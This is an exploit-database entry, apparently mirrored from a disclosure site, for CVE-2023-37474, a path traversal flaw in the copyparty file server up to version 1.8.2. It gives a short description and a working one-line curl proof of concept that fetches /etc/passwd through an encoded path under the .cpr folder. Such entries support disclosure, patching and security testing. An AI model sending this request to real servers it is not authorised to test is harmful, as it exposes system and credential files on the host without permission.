# Exploit Title: copyparty 1.8.2 - Directory Traversal # Date: 14/07/2023 # Exploit Author: Vartamtzidis Theodoros (@TheHackyDog) # Vendor Homepage: https://github.com/9001/copyparty/ # Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2 # Version: <=1.8.2 # Tested on: Debian Linux # CVE : CVE-2023-37474 #Description Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. #POC curl -i -s -k -X GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD
